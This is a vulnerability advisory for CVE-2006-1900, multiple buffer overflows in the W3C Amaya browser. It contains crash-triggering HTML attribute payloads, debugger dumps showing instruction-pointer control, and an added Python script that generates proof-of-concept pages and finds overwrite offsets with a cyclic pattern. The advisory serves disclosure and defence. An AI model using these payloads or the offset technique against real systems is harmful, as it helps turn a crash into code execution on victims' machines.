Multiple W3C Amaya Remote Overflow Vulnerabilities

CNNVD ID: CNNVD-200604-389
CVE ID: CVE-2006-1900
Published: 2006-04-20
Updated: 2006-04-24
Vulnerability type: buffer overflow
Source: Thomas Waldegger bugtraq@morph3us.org
Severity: High
Threat type: remote
Vendor: w3c

Description

W3C's Amaya is a WYSIWYG web browser and web authoring tool.

Amaya's implementation contains multiple buffer overflows. Each is triggered by an over-long value in an HTML attribute (a run of "A" bytes in the colgroup compact, textarea rows and legend color attributes); the attribute bytes overwrite pointers that the renderer later dereferences, so a remote attacker who gets a victim to open a crafted page can crash Amaya or, since the saved return address can be overwritten as well, execute arbitrary code.

The following snippets (and probably other, similar ones) force Amaya to crash ("Ax200" stands for the letter A repeated 200 times):

> <colgroup compact="Ax200">
> [...]
> <textarea rows="Ax200">
>
> eax=000000f9 ebx=02ae8420 ecx=77bcec76 edx=41414141 esi=007b9420
> edi=01ae6d5c eip=004edd95 esp=0012e7ac ebp=007d6110 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
>
> 004edd61 03f3 add esi,ebx
> 004edd63 a4 movsb
> 004edd64 8b4500 mov eax,[ebp]
> 004edd67 8b8c241c010000 mov ecx,[esp+0x11c]
> 004edd6e 8b942418010000 mov edx,[esp+0x118]
> 004edd75 50 push eax
> 004edd76 51 push ecx
> 004edd77 53 push ebx
> 004edd78 52 push edx
> 004edd79 e8a23c0200 call amaya+0x111a20 (00511a20)
> 004edd7e 53 push ebx
> 004edd7f e83cf90000 call amaya+0xfd6c0 (004fd6c0)
> 004edd84 83c428 add esp,0x28
> 004edd87 8bbc24fc000000 mov edi,[esp+0xfc]
> 004edd8e 8b942400010000 mov edx,[esp+0x100]
> FAULT ->004edd95 8b4240 mov eax,[edx+0x40]
> ds:0023:41414181=????????
> 004edd98 83f844 cmp eax,0x44
> 004edd9b 0f8527030000 jne amaya+0xee0c8 (004ee0c8)
> 004edda1 837c242457 cmp dword ptr [esp+0x24],0x57
> 004edda6 0f8465060000 je amaya+0xee411 (004ee411)
> 004eddac 8b4500 mov eax,[ebp]
> 004eddaf 8b8c2408010000 mov ecx,[esp+0x108]
> 004eddb6 6aff push 0xff
> 004eddb8 50 push eax
> 004eddb9 51 push ecx
> 004eddba 57 push edi
> 004eddbb e8d33af1ff call amaya+0x1893 (00401893)
> 004eddc0 83c410 add esp,0x10
> 004eddc3 5f pop edi
> 004eddc4 5e pop esi
> 004eddc5 5d pop ebp

The fault above is a read through edx, which the attribute bytes have overwritten with 0x41414141. With a longer value, EIP itself can be controlled: the trailing "BBBB" of the following textarea rows value ends up in the instruction pointer (eip=42424242):

> <textarea rows=
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB>
>
> eax=00000001 ebx=00000000 ecx=77c10e72 edx=007bd472
> esi=0000003e edi=00000000 eip=42424242 esp=0012ea38 ebp=00000000
>
> Function: <nosymbols>
> No prior disassembly possible
> 42424242 ?? ???
> 42424244 ?? ???
> 42424246 ?? ???
> 42424248 ?? ???
> 4242424a ?? ???
> 4242424c ?? ???

In addition, the following snippet also crashes Amaya 9.4; here the over-long attribute lands in ecx, which is then dereferenced:

> <legend color="Ax200">
>
> eax=41414141 ebx=02ae7200 ecx=41414141 edx=41414141 esi=00000000
> edi=00000000 eip=00516135 esp=0012e1cc ebp=007dd6e8 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
>
> 00516114 56 push esi
> 00516115 57 push edi
> 00516116 33ff xor edi,edi
> 00516118 33f6 xor esi,esi
> 0051611a 3bcf cmp ecx,edi
> 0051611c 893d943df101 mov [amaya+0x1b13d94 (01f13d94)],edi
> 00516122 7511 jnz amaya+0x116135 (00516135)
> 00516124 6a0a push 0xa
> 00516126 e825d80500 call amaya+0x173950 (00573950)
> 0051612b 83c404 add esp,0x4
> 0051612e 8bd7 mov edx,edi
> 00516130 8bc6 mov eax,esi
> 00516132 5f pop edi
> 00516133 5e pop esi
> 00516134 c3 ret
> FAULT ->00516135 8b4134 mov eax,[ecx+0x34]
> ds:0023:41414175=????????
> 00516138 3bc7 cmp eax,edi
> 0051613a 74f2 jz amaya+0x11612e (0051612e)
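The advisory only shows fixed fillers ("Ax200", and a run of "A" followed by "BBBB" that lands in EIP); it does not state the offset at which the return address is overwritten. The script below is an added example, not code from the advisory or from Amaya: it writes one test page per tag/attribute pair named above, and replaces the plain "A" filler with a cyclic pattern so that the value that shows up in eip (or edx/ecx in the read faults) can be mapped straight back to an offset in the attribute value. The file names, the 200-byte filler length and the "BBBB" marker are assumptions chosen to mirror the advisory's shape, not values it specifies.

```python
#!/usr/bin/env python3
"""Added example (not from the original advisory or from Amaya).

Builds the crash pages described in the advisory and recovers the
offset of a controlled register from a cyclic pattern.  Filler length,
marker bytes and output file names are assumptions, not advisory data.
"""
import itertools
import string

# The three tag/attribute pairs the advisory lists as crashing Amaya 9.4.
CRASH_CASES = [
    ("colgroup", "compact"),
    ("textarea", "rows"),
    ("legend", "color"),
]


def cyclic_pattern(length):
    """Metasploit-style pattern "Aa0Aa1Aa2...": upper/lower/digit triplets.

    Within the first 20280 bytes every 4-byte window is unique, so the
    4 bytes that end up in a register identify their offset in the value.
    """
    chars = (string.ascii_uppercase, string.ascii_lowercase, string.digits)
    out = []
    for a, b, c in itertools.product(*chars):
        out.append(a + b + c)
        if len(out) * 3 >= length:
            break
    return "".join(out)[:length]


def pattern_offset(reg_value, length=20280):
    """Map a 32-bit register value seen in the debugger (e.g. eip) back to
    the offset of those bytes inside cyclic_pattern(length), or -1.

    x86 is little-endian, so the register holds the bytes reversed relative
    to their order in memory; to_bytes(..., "little") undoes that.
    """
    needle = reg_value.to_bytes(4, "little").decode("ascii", errors="replace")
    return cyclic_pattern(length).find(needle)


def build_poc(tag, attr, value):
    """Minimal page whose single attribute carries the over-long value."""
    return ("<html><body>\n"
            f'<{tag} {attr}="{value}">\n'
            "</body></html>\n")


def write_all(filler_len=200, marker="BBBB", outdir=".", cyclic=False):
    """Write one page per crash case.

    cyclic=False reproduces the advisory's shape: "A" * filler_len + marker.
    cyclic=True writes a cyclic pattern instead, to be used with
    pattern_offset() once the crash has been observed in a debugger.
    """
    if cyclic:
        value = cyclic_pattern(filler_len + len(marker))
    else:
        value = "A" * filler_len + marker
    paths = []
    for tag, attr in CRASH_CASES:
        path = f"{outdir}/amaya_{tag}_{attr}.html"  # assumed naming
        with open(path, "w") as f:
            f.write(build_poc(tag, attr, value))
        paths.append(path)
    return paths


if __name__ == "__main__":
    for p in write_all(cyclic=True):
        print("wrote", p)
    # Example: a debugger shows eip=0x41306141 -> bytes "Aa0A" -> offset 0
    print("offset of eip=0x41306141:", pattern_offset(0x41306141))
```

Open each generated page in the vulnerable Amaya build under a debugger; with the cyclic variant, feed the faulting register value to pattern_offset() to learn which bytes of the attribute value reach that register, instead of growing an "A" run by trial and error.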

Patch

The vendor has released an updated version that fixes this issue; download link:

References

Affected entities

Sources